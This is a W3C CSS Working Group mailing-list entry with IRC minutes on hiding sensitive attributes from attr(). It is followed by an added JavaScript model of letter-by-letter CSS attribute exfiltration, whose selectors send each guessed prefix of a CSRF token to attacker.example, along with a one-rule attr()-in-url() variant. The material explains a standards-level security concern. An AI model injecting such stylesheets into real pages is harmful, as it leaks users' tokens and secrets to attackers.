- From: CSS Meeting Bot via GitHub <sysbot+gh@w3.org>
- Date: Wed, 24 Jun 2020 17:00:14 +0000
- To: public-css-archive@w3.org
The CSS Working Group just discussed `[selectors][css-values] Hide "sensitive" attributes from CSS`.

The full IRC log of that discussion:

<dael> Topic: [selectors][css-values] Hide "sensitive" attributes from CSS
<dael> github: https://github.com/w3c/csswg-drafts/issues/5136
<dael> TabAtkins: Review is: this allows for a known attack. Makes it a whole lot easier to do background URLs. Rather than partly loading and building letter by letter you can instead grab the whole thing and ship it out.
<dael> TabAtkins: Some bits can be crafted with spec language, but some can't. Some attributes will host data and can be extracted. This is a problem.
<dael> TabAtkins: I'd like to be able to code these attributes. But I don't want to expose arbitrary data attributes with sensitive information.
<dael> TabAtkins: Some suggestions in the thread about how to solve. Mark some as safe and unsafe and a mech for JS to swap between categories so you can use some attributes safely.
<dael> TabAtkins: I don't know the final solution. It's a blocker for attr() b/c it makes the attack easier.
<dael> TabAtkins: Anyone interested in security concerns please review and help me figure out a solution that's not cumbersome or weird.
<dael> astearns: Any initial thoughts?
<dael> faceless2_: This is used already in lots of print engines. It would be a shame to break everything by blocking href and other common
<dael> TabAtkins: We should set up the spec so that UAs in secure spaces can ignore this. I'm concerned about things like CSS injection attacks. Print should be fine and I will make sure I allow it.
<dael> astearns: Thanks for the intro, we'll get back to this.

--
GitHub Notification of comment by css-meeting-bot
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5136#issuecomment-648943684 using your GitHub account
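The "known attack" TabAtkins refers to is CSS-only attribute exfiltration: an attacker who can inject a stylesheet (but not script) emits one `[value^="prefix"]` selector per candidate character, each with a `background: url(...)` pointing at a server they control, so the browser leaks the attribute one character per round. The model below is an added example written for this page, not code from the CSS WG thread or any browser; the target element (`<input name="csrf">` holding a hex token), the collection endpoint `https://attacker.example/leak` and the sample token are all constructed. The contrast the minutes draw is that if `attr()` could be used inside `url()`, a single rule could carry the whole attribute value in one request instead of needing this per-character loop.

```javascript
// Added example: model of letter-by-letter CSS attribute exfiltration.
// Everything here is constructed for illustration; it does not touch the network.
const HEX = "0123456789abcdef";                      // assumed token alphabet
const EXFIL_BASE = "https://attacker.example/leak";  // assumed attacker endpoint
const TARGET = 'input[name="csrf"]';                 // assumed victim element

// One round of the attack: a stylesheet with one rule per candidate next
// character. Only the rule whose prefix matches the attribute will be applied,
// and only an applied rule makes the browser fetch its background URL.
function buildProbeSheet(known, alphabet = HEX) {
  return alphabet.split("").map((ch) => {
    const prefix = known + ch;
    return {
      prefix,
      css: `${TARGET}[value^="${prefix}"] { background: url("${EXFIL_BASE}?p=${encodeURIComponent(prefix)}"); }`,
    };
  });
}

// Simulates the browser side: [value^="..."] matches when the attribute value
// starts with the prefix, and a matching rule triggers a request for its
// background URL. Returns the URL the attacker's server would log, or null
// when no rule in the sheet matches.
function simulateBrowser(sheet, attributeValue) {
  const hit = sheet.find((rule) => attributeValue.startsWith(rule.prefix));
  return hit ? hit.css.match(/url\("([^"]+)"\)/)[1] : null;
}

// Drives the whole attack against a constructed token and records its cost:
// one stylesheet round and one outbound request per leaked character, and
// |alphabet| rules shipped per round. A character outside the alphabet stalls
// the attack (no rule matches, nothing is fetched).
function exfiltrateByPrefix(secret, alphabet = HEX) {
  let known = "";
  let requests = 0;
  let rulesShipped = 0;
  while (known.length < secret.length) {
    const sheet = buildProbeSheet(known, alphabet);
    rulesShipped += sheet.length;
    const url = simulateBrowser(sheet, secret);
    if (url === null) break;
    known = new URL(url).searchParams.get("p");
    requests += 1;
  }
  return { leaked: known, requests, rulesShipped };
}

// Constructed sample token, not a real secret.
const SAMPLE_TOKEN = "3f9ac1";
console.log(exfiltrateByPrefix(SAMPLE_TOKEN));
// For comparison, the attr()-in-url() shape the issue is about would need a
// single rule and a single request for the full value (syntax hypothetical):
//   input[name="csrf"] { background: url(attr(value)); }
```

Running it leaks the six-character sample token in six rounds of sixteen rules each, which is why the technique is noisy and slow today; the concern in the minutes is that `attr()` inside `url()` would collapse that to one rule and one request, and that the draft must either restrict which attributes `attr()` can expose or give UAs in sensitive contexts a way to refuse it.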
Received on Wednesday, 24 June 2020 17:00:16 UTC